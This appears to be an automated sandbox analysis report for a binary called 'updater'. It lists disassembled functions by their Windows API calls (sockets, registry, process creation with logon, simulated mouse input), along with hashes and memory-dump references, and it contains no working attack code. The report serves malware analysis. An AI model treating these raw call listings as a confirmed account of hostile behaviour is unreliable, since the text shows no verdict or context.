Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 480f71103d620af07c7bb23135b8b5961b1b6c9b1cb9f2dfaadf1a184b54dc3e
Instruction ID: 6604bce32b5504425c9130980a78829e81e56398b7d13feba0a22be9eeb54f91
Opcode Fuzzy Hash: 480f71103d620af07c7bb23135b8b5961b1b6c9b1cb9f2dfaadf1a184b54dc3e
Instruction Fuzzy Hash: 75311230606151AFDF22CF58ED8AF6537E9EB4A714F1A01A5F9158F2B2CB72AC40DB50

Function 0036E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036E2F0
SysAllocString.OLEAUT32(00000000), ref: 0036E2F3
SysAllocString.OLEAUT32(?), ref: 0036E311
SysFreeString.OLEAUT32(?), ref: 0036E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 0036E33F
SysAllocString.OLEAUT32(?), ref: 0036E34D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 65f9eb0b62ef17b65fce835541757ddd286154316ed697865809a0ebe32e7b99
Instruction ID: b47fd45e6172185256813fbebd3cab8bd5e4af552f79d7af0da3df5ec0f9461d
Opcode Fuzzy Hash: 65f9eb0b62ef17b65fce835541757ddd286154316ed697865809a0ebe32e7b99
Instruction Fuzzy Hash: 5A21A47A604219BF9F16DFA8DC88CBF77ACEB09360B158125FA14DB254D670EC498B60

Function 0038685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00388475: inet_addr.WSOCK32(00000000), ref: 003884A0

socket.WSOCK32(00000002,00000001,00000006), ref: 003868B1
WSAGetLastError.WSOCK32(00000000), ref: 003868C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003868F9
connect.WSOCK32(00000000,?,00000010), ref: 00386902
WSAGetLastError.WSOCK32 ref: 0038690C
closesocket.WSOCK32(00000000), ref: 00386935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0038694E

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: d4eba93ccaaba9a11e1767a0f374d66a6360ceb8f32d66df30a674d6f06f584c
Instruction ID: ff2d1bb324064c29cbf8b17d4ef415c54742105f7ed5c95ec435e78ef740c333
Opcode Fuzzy Hash: d4eba93ccaaba9a11e1767a0f374d66a6360ceb8f32d66df30a674d6f06f584c
Instruction Fuzzy Hash: C331E771200208AFDF16AF64CC86BBD77ADEB45720F058059FD05AB291DB74AC448BA1

Function 0036E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036E3CB
SysAllocString.OLEAUT32(00000000), ref: 0036E3CE
SysAllocString.OLEAUT32 ref: 0036E3EF
SysFreeString.OLEAUT32 ref: 0036E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 0036E412
SysAllocString.OLEAUT32(?), ref: 0036E420

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 593f1b14efdbd4f4c8f03419e12a2cae6391855af4c5b9da397008b637d510c8
Instruction ID: a63e27e5984d1f7f2a4ca39e06ec713885f12876b608d13cf80107fde1f93ae7
Opcode Fuzzy Hash: 593f1b14efdbd4f4c8f03419e12a2cae6391855af4c5b9da397008b637d510c8
Instruction Fuzzy Hash: 03218639604204AFAB169FB9DC88CAF77ECEB0D360B11C125F915CB264EA74EC458B64

Function 016D9A45 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 016D98AD: VirtualQuery.KERNEL32(?,?,0000001C), ref: 016D98C9
Part of subcall function 016D98AD: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 016D98ED
Part of subcall function 016D98AD: GetModuleFileNameA.KERNEL32(00310000,?,00000105), ref: 016D9908
Part of subcall function 016D98AD: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 016D99AC

CharToOemA.USER32(?,?), ref: 016D9A7C
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 016D9A99
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 016D9A9F
GetStdHandle.KERNEL32(000000F4,016D9B09,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 016D9AB4
WriteFile.KERNEL32(00000000,000000F4,016D9B09,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 016D9ABA
LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 016D9ADC
MessageBoxA.USER32(00000000,?,?,00002010), ref: 016D9AF2

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: be46c6d5ab5bc83177428afc9f33f8fc5d6f1d98a3eaad605a2c924fb544d170
Instruction ID: ebf1ffaf1c08668f939d0148f0cf6fdef9d73f38d5de63924935fa1c157d5c80
Opcode Fuzzy Hash: be46c6d5ab5bc83177428afc9f33f8fc5d6f1d98a3eaad605a2c924fb544d170
Instruction Fuzzy Hash: B011CEB2E08202BAD700EBA4CC84FAB73FDAB65700F404A1DB755DA4E0EB70D8048726

Function 003341B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00334282,?), ref: 003341D3
GetProcAddress.KERNEL32(00000000), ref: 003341DA
EncodePointer.KERNEL32(00000000), ref: 003341E6
DecodePointer.KERNEL32(00000001,00334282,?), ref: 00334203

Strings

combase.dll, xrefs: 003341CE
RoInitialize, xrefs: 003341C2

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 4b064634ad33654e3fe6cf2c27135f0977c0bdd644ce00d919b186faad3abf74
Instruction ID: 677c170df38deb1f0a12bff1846c6022f6b25794f215dae5d9447bc2cedb5b9b
Opcode Fuzzy Hash: 4b064634ad33654e3fe6cf2c27135f0977c0bdd644ce00d919b186faad3abf74
Instruction Fuzzy Hash: B3E01A78A91701AFDF531F70EC4DB49366CA712B06F604526F401D50E0DBB550848F00

Function 0033428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003341A8), ref: 003342A8
GetProcAddress.KERNEL32(00000000), ref: 003342AF
EncodePointer.KERNEL32(00000000), ref: 003342BA
DecodePointer.KERNEL32(003341A8), ref: 003342D5

Strings

combase.dll, xrefs: 003342A3
RoUninitialize, xrefs: 00334297

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 2c0836e59e9940e7b335de967a7cea1f0c87bec0555183b7ee3780bd888e3876
Instruction ID: 5d4cb57b0877cc4cd7b320ac1c197dd6e09d68807cadaa153583a98ec46d80fd
Opcode Fuzzy Hash: 2c0836e59e9940e7b335de967a7cea1f0c87bec0555183b7ee3780bd888e3876
Instruction Fuzzy Hash: BCE0BD74692B01EFEF579F60BD4DB863BACBB02B02F50491AF001E60E0CBB55604CB10

Function 0031218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 003121B8
GetWindowRect.USER32(?,?), ref: 003121F9
ScreenToClient.USER32(?,?), ref: 00312221
GetClientRect.USER32(?,?), ref: 00312350
GetWindowRect.USER32(?,?), ref: 00312369

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 6cb3fc38a99b685b76942b6c64814dba4a8c7f8c1ab768620dcea28e56c84cb8
Instruction ID: 2402014cb1d6fe7324cbdd6b2c0ffdd389d9392b6133ea3f8602a24d9e843e6a
Opcode Fuzzy Hash: 6cb3fc38a99b685b76942b6c64814dba4a8c7f8c1ab768620dcea28e56c84cb8
Instruction Fuzzy Hash: 83B1B039900249DBCF15CFA8C8807EEB7B5FF48310F159529ED99EB654DB30A9A0CB64

Function 00376A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00376BC6
_memmove.LIBCMT ref: 00376B01

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

_memmove.LIBCMT ref: 00376B74
_memmove.LIBCMT ref: 00376C5B
_memmove.LIBCMT ref: 00376C74
_memmove.LIBCMT ref: 00376C90

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 8fde672179399db9857cbe6c68656422bfac3509fe7609b2a2c9228b036b602e
Instruction ID: 66225dbc6b0a23345aafff12ccd2b74d4f2475946140ce0b65e48808155c8865
Opcode Fuzzy Hash: 8fde672179399db9857cbe6c68656422bfac3509fe7609b2a2c9228b036b602e
Instruction Fuzzy Hash: 56619F7150069AABCF2BEF60CC92EFE37A8AF09304F058559F8595F292DB389D45CB50

Function 00390844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0039147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039040D,?,?), ref: 00391491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00390980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003909A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 003909EC
RegCloseKey.ADVAPI32(00000000), ref: 003909F9

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: da7309eed509035facbb0728936b93cdaf6c26143006058c3e47d62da7da3bd4
Instruction ID: dfdb6a05fe28958f91239e48211d0dc230ab7d5a9a129aa59a3a8c8782779907
Opcode Fuzzy Hash: da7309eed509035facbb0728936b93cdaf6c26143006058c3e47d62da7da3bd4
Instruction Fuzzy Hash: EA516C311082009FDB1AEF64C985E6BBBE9FF89314F04491DF5858B2A2DB31E945CB92

Function 0036F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0036F6A2
VariantClear.OLEAUT32(00000013), ref: 0036F714
VariantClear.OLEAUT32(00000000), ref: 0036F76F
_memmove.LIBCMT ref: 0036F799
VariantClear.OLEAUT32(?), ref: 0036F7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0036F814

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 17e6ad05b346061bf558914eed4f0c69497682b74352187a459e4f059b01b04c
Instruction ID: 6c3cf396f422493fb08c99855cc1cd68cc8b552153849f87aa66af030c3ded81
Opcode Fuzzy Hash: 17e6ad05b346061bf558914eed4f0c69497682b74352187a459e4f059b01b04c
Instruction Fuzzy Hash: 2F5158B5A00209EFCB15CF58D884AAAB7B8FF4D354F15856AE959DB304E730E911CFA0

Function 003729B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003729FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00372A4A
IsMenu.USER32(00000000), ref: 00372A6A
CreatePopupMenu.USER32 ref: 00372A9E
GetMenuItemCount.USER32(000000FF), ref: 00372AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00372B2D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 553563966fe61cb425ff648d06cfd7c19adb9b499f86e5d69c53fe06abf34089
Instruction ID: 7ebb9cd14505852a670451773d120ac97218b513e02943c0c3916089a58feacf
Opcode Fuzzy Hash: 553563966fe61cb425ff648d06cfd7c19adb9b499f86e5d69c53fe06abf34089
Instruction Fuzzy Hash: 5B51C070A00309DFCF36CF68C888BAFBBF8AF45314F108159E8199B2A1D7789944CB51

Function 00387788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,0038550C,?,?,00000000,00000001), ref: 00387796

Part of subcall function 0038406C: GetWindowRect.USER32(?,?), ref: 0038407F

GetDesktopWindow.USER32 ref: 003877C0
GetWindowRect.USER32(00000000), ref: 003877C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003877F9

Part of subcall function 003757FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00375877

GetCursorPos.USER32(?), ref: 00387825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00387883

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: cd9b8711fc8c4a29e6b0958c7d1580a80168d33365689abe643dfeaeb12015cc
Instruction ID: 0db1d9535a37baf01f5802e0171501f89d8ea6af228a462a94442fc198d8cd45
Opcode Fuzzy Hash: cd9b8711fc8c4a29e6b0958c7d1580a80168d33365689abe643dfeaeb12015cc
Instruction Fuzzy Hash: E931E172508305ABD726EF14C849F9BB7EEFF89314F100919F59997191CB70E909CBA2

Function 016D0B1D Relevance: 9.1, APIs: 6, Instructions: 72COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(016EE51D), ref: 016D0B4C
LocalFree.KERNEL32(016FF188,00000000,016D0C11), ref: 016D0B5E
VirtualFree.KERNEL32(?,00000000,00008000,016FF188,00000000,016D0C11), ref: 016D0B82
LocalFree.KERNEL32(00000000,?,00000000,00008000,016FF188,00000000,016D0C11), ref: 016D0BD3
RtlLeaveCriticalSection.NTDLL(016EE51D), ref: 016D0C01
RtlDeleteCriticalSection.NTDLL(016EE51D), ref: 016D0C0B

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 96417fda2c8a02174bdc079c0635b68874e7c325b8df2e4ea23175b846a3559e
Instruction ID: 5ffe12bb0e7902f62274af8091db615b2bd041d4a63c70b2d5755c92b752292a
Opcode Fuzzy Hash: 96417fda2c8a02174bdc079c0635b68874e7c325b8df2e4ea23175b846a3559e
Instruction Fuzzy Hash: 7B215C70E0A704AFDB21DFE8EC49B5A7BE1E709200F509699F4049B394F7739A50CB15

Function 00369431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00368CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00368CDE
Part of subcall function 00368CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00368CE8
Part of subcall function 00368CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00368CF7
Part of subcall function 00368CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00368CFE
Part of subcall function 00368CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00368D14

GetLengthSid.ADVAPI32(?,00000000,0036904D), ref: 00369482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0036948E
HeapAlloc.KERNEL32(00000000), ref: 00369495
CopySid.ADVAPI32(00000000,00000000,?), ref: 003694AE
GetProcessHeap.KERNEL32(00000000,00000000,0036904D), ref: 003694C2
HeapFree.KERNEL32(00000000), ref: 003694C9

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 4568beac13b3d6852a3f79cd42f94a1df2d1fa99c9141983c3f0cd7d5335fc86
Instruction ID: b80862f1b8d0784b3ea14d4e5729602f552fd1c7d96b0361e4287d6033411797
Opcode Fuzzy Hash: 4568beac13b3d6852a3f79cd42f94a1df2d1fa99c9141983c3f0cd7d5335fc86
Instruction Fuzzy Hash: 6611DC32601204EFDB17CFA5CC09BAE7BBDEF46322F10C01AE84197218CB36A901CB60

Function 003691CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00369200
OpenProcessToken.ADVAPI32(00000000), ref: 00369207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00369216
CloseHandle.KERNEL32(00000004), ref: 00369221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00369250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00369264

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 0367b468991a3f5ebee2c09318c1f471dc019d6d7fc4ce42c4138c1949a6c1ef
Instruction ID: 118c764b5bd5319e4872ea0f038704e175b8b65d0750c889ce507054a5ee6d99
Opcode Fuzzy Hash: 0367b468991a3f5ebee2c09318c1f471dc019d6d7fc4ce42c4138c1949a6c1ef
Instruction Fuzzy Hash: CC11477250120EABDF028FA4ED49BDA7BADEB49304F158015FA04A2160C2769D60EB60

Function 0036C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0036C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 0036C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0036C366
ReleaseDC.USER32(00000000,00000000), ref: 0036C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0036C385
MulDiv.KERNEL32(000009EC,?,?), ref: 0036C397

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

